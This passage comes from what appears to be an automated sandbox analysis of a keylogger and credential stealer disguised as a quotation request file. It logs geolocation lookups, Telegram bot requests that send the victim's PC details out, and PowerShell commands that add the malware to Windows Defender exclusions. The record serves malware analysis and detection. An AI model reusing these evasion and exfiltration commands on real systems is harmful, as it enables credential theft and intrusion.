York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZon

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.9	49789	188.114.97.3	443	7636	C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-21 11:20:31 UTC	84	OUT	GET /xml/8.46.123.75 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-11-21 11:20:31 UTC	853	IN	HTTP/1.1 200 OK Date: Thu, 21 Nov 2024 11:20:31 GMT Content-Type: text/xml Content-Length: 361 Connection: close Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 151940 Last-Modified: Tue, 19 Nov 2024 17:08:11 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xh3BAjTWKmpS71A1xeqGshvAq7ZYlvE6p4K41K9M8f%2FQmqdJs8%2F0fcnGUKudGIBgBQyvADoHd4j06hhKDRsrjlo0FDvfs%2BWFgKH93%2F03t1R6eJwEjeKK3mWs3xmuu3rLDBYZXbTf"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e604a7cc88119cf-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2740&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2849&recv_bytes=698&delivery_rate=1047721&cwnd=252&unsent_bytes=0&cid=644f78d0aa2f192e&ts=461&x=0"
2024-11-21 11:20:31 UTC	361	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f 6e Data Ascii: <Response><IP>8.46.123.75</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZon

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.9	49796	188.114.97.3	443	7264	C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-21 11:20:33 UTC	84	OUT	GET /xml/8.46.123.75 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-11-21 11:20:33 UTC	857	IN	HTTP/1.1 200 OK Date: Thu, 21 Nov 2024 11:20:33 GMT Content-Type: text/xml Content-Length: 361 Connection: close Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 151942 Last-Modified: Tue, 19 Nov 2024 17:08:11 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9kFHzEv4X3Z2YI%2FynDwGe0IlURlD%2BBx4Rr44TfVCO3cESKCOOGq5VQpVyaL8WCdkS4iH8%2FV89HfIVFgD%2Fiuisq9C3AhJObiijcLlG79paqqKQ0zhNBS0Yom%2BC0VyNd2cvZGNj0j%2B"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e604a8b29ad0f63-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1546&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=698&delivery_rate=1875401&cwnd=219&unsent_bytes=0&cid=24b38f5929a6bf0d&ts=459&x=0"
2024-11-21 11:20:33 UTC	361	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f 6e Data Ascii: <Response><IP>8.46.123.75</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZon

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.9	49797	188.114.97.3	443	7636	C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-21 11:20:34 UTC	60	OUT	GET /xml/8.46.123.75 HTTP/1.1 Host: reallyfreegeoip.org
2024-11-21 11:20:34 UTC	856	IN	HTTP/1.1 200 OK Date: Thu, 21 Nov 2024 11:20:34 GMT Content-Type: text/xml Content-Length: 361 Connection: close Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 151943 Last-Modified: Tue, 19 Nov 2024 17:08:11 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Rbrus5ry61uJzeJ7ztsRPgV0mPzVMTICutea8u%2FfEGjtE5bNpic7hLWrLLEUra3VMhog2P%2FnmX4PYb4fNGU%2BQ5w%2BOHZPadib%2FKLJhED8vi6H5Kz6B4i080jgpROZq3O4npL7ahFo"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e604a90adad8cc3-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=14986&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=698&delivery_rate=1465863&cwnd=217&unsent_bytes=0&cid=cdcc52d6d470cfcd&ts=461&x=0"
2024-11-21 11:20:34 UTC	361	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f 6e Data Ascii: <Response><IP>8.46.123.75</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZon

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.9	49805	188.114.97.3	443	7264	C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-21 11:20:36 UTC	84	OUT	GET /xml/8.46.123.75 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-11-21 11:20:37 UTC	857	IN	HTTP/1.1 200 OK Date: Thu, 21 Nov 2024 11:20:37 GMT Content-Type: text/xml Content-Length: 361 Connection: close Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 151946 Last-Modified: Tue, 19 Nov 2024 17:08:11 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=rcbxT5VEMIP%2F%2FSPNUzp4nyh4EmsAg7DbiQARgVEXnlnsfRbIvteiIqwb1cng3U%2BlXhHA8wqi%2B8BWZEojfg0qNT%2BYLUugk0yXnpShK60Ex8l4X3wJuZ7t3anlNHbvk%2BCqHIz5UJkv"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e604a9f9d637c99-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1828&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2849&recv_bytes=698&delivery_rate=1544156&cwnd=229&unsent_bytes=0&cid=6429d99af6a0c429&ts=460&x=0"
2024-11-21 11:20:37 UTC	361	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f 6e Data Ascii: <Response><IP>8.46.123.75</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZon

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.9	49806	188.114.97.3	443	7636	C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-21 11:20:37 UTC	60	OUT	GET /xml/8.46.123.75 HTTP/1.1 Host: reallyfreegeoip.org
2024-11-21 11:20:37 UTC	855	IN	HTTP/1.1 200 OK Date: Thu, 21 Nov 2024 11:20:37 GMT Content-Type: text/xml Content-Length: 361 Connection: close Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 151946 Last-Modified: Tue, 19 Nov 2024 17:08:11 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=20kSWI2sb1arPwX5Bgh6nQ7jNbppjHeTU%2FMqqOVpCNzQN9nPzBp9oS56r3qMwGcrPQeLmm1FkYTAgQUudte1V1JB77%2F64%2BZUtV8MCIwI78%2Bdqseai1nbUxIrO1hHTnxQ04uck%2BwW"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e604aa41e534252-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1570&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=698&delivery_rate=1813664&cwnd=235&unsent_bytes=0&cid=0e863676e41abcc1&ts=464&x=0"
2024-11-21 11:20:37 UTC	361	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f 6e Data Ascii: <Response><IP>8.46.123.75</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZon

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.9	49814	188.114.97.3	443	7264	C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-21 11:20:39 UTC	84	OUT	GET /xml/8.46.123.75 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-11-21 11:20:40 UTC	851	IN	HTTP/1.1 200 OK Date: Thu, 21 Nov 2024 11:20:40 GMT Content-Type: text/xml Content-Length: 361 Connection: close Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 151949 Last-Modified: Tue, 19 Nov 2024 17:08:11 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=D76Viau658wwSPTMSOJBs%2BBl8U4S40E2JseDIh0VYIExGZJwQMkdnXjR%2BTGfYpHHSnaPE7phTSV2LSJY9HaKnMo7V1yzlpbH8BMq%2BJ6TANtVJFMAQn1FTwtOgPaRiky4fo9DP1GN"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e604ab34c8d8c5d-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1803&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2849&recv_bytes=698&delivery_rate=1593886&cwnd=202&unsent_bytes=0&cid=7a339ed6331382da&ts=462&x=0"
2024-11-21 11:20:40 UTC	361	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f 6e Data Ascii: <Response><IP>8.46.123.75</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZon

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.9	49820	188.114.97.3	443	7636	C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-21 11:20:40 UTC	84	OUT	GET /xml/8.46.123.75 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-11-21 11:20:41 UTC	853	IN	HTTP/1.1 200 OK Date: Thu, 21 Nov 2024 11:20:40 GMT Content-Type: text/xml Content-Length: 361 Connection: close Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 151949 Last-Modified: Tue, 19 Nov 2024 17:08:11 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=WhB7aW%2BgDYHJdbi0oX0dAgw%2B1k9PsAnalJGoD6rITSZ162d8P29aLGQxLQS7jEcVEYqLwGj9mh7iXhgC%2F30yKVBwOY1SVktePvutFyXOtj%2B5XK2Db8RrKHeqiqsUJ76LtRqWWumG"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e604ab7d93419b2-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1945&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2848&recv_bytes=698&delivery_rate=1468074&cwnd=148&unsent_bytes=0&cid=2d67e2b52c029a4c&ts=459&x=0"
2024-11-21 11:20:41 UTC	361	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f 6e Data Ascii: <Response><IP>8.46.123.75</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZon

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.9	49821	149.154.167.220	443	7264	C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-21 11:20:42 UTC	349	OUT	GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:971342%0D%0ADate%20and%20Time:%2022/11/2024%20/%2014:24:56%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20971342%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1 Host: api.telegram.org Connection: Keep-Alive
2024-11-21 11:20:42 UTC	344	IN	HTTP/1.1 404 Not Found Server: nginx/1.18.0 Date: Thu, 21 Nov 2024 11:20:42 GMT Content-Type: application/json Content-Length: 55 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-11-21 11:20:42 UTC	55	IN	Data Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 34 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 7d Data Ascii: {"ok":false,"error_code":404,"description":"Not Found"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.9	49828	188.114.97.3	443	7636	C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-21 11:20:43 UTC	60	OUT	GET /xml/8.46.123.75 HTTP/1.1 Host: reallyfreegeoip.org
2024-11-21 11:20:44 UTC	859	IN	HTTP/1.1 200 OK Date: Thu, 21 Nov 2024 11:20:44 GMT Content-Type: text/xml Content-Length: 361 Connection: close Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 151953 Last-Modified: Tue, 19 Nov 2024 17:08:11 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DgbC6VViAgQ8QiclbfojwO%2BjjoMsxuMARrQvN6cdIK4eM4%2Ban9T%2FLb3%2Fc%2Fx%2FadBXLAETn6J86kFfYgaULVSxpvQommGFXA9fSyZOpgQCqMe89O4ZKnT%2FHYdYCLp2wu6Ar5QhO8qJ"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e604acb4d57c457-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1873&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=698&delivery_rate=1541710&cwnd=252&unsent_bytes=0&cid=e3c9e4983aa8c03c&ts=467&x=0"
2024-11-21 11:20:44 UTC	361	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f 6e Data Ascii: <Response><IP>8.46.123.75</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZon

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.9	49834	149.154.167.220	443	7636	C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-21 11:20:45 UTC	349	OUT	GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:971342%0D%0ADate%20and%20Time:%2022/11/2024%20/%2011:49:50%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20971342%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1 Host: api.telegram.org Connection: Keep-Alive
2024-11-21 11:20:46 UTC	344	IN	HTTP/1.1 404 Not Found Server: nginx/1.18.0 Date: Thu, 21 Nov 2024 11:20:46 GMT Content-Type: application/json Content-Length: 55 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-11-21 11:20:46 UTC	55	IN	Data Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 34 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 7d Data Ascii: {"ok":false,"error_code":404,"description":"Not Found"}

Target ID:	0
Start time:	06:20:06
Start date:	21/11/2024
Path:	C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe"
Imagebase:	0xbd0000
File size:	1'017'856 bytes
MD5 hash:	1AE7A890014EBA9C807C6ADEABAC7671
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1416830632.00000000040B9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000000.00000002.1416830632.00000000040B9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000000.00000002.1416830632.00000000040B9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000000.00000002.1416830632.00000000040B9000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	06:20:08
Start date:	21/11/2024
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe"
Imagebase:	0xae0000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	06:20:08
Start date:	21/11/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff70f010000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	06:20:08
Start date:	21/11/2024
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe"
Imagebase:	0xae0000
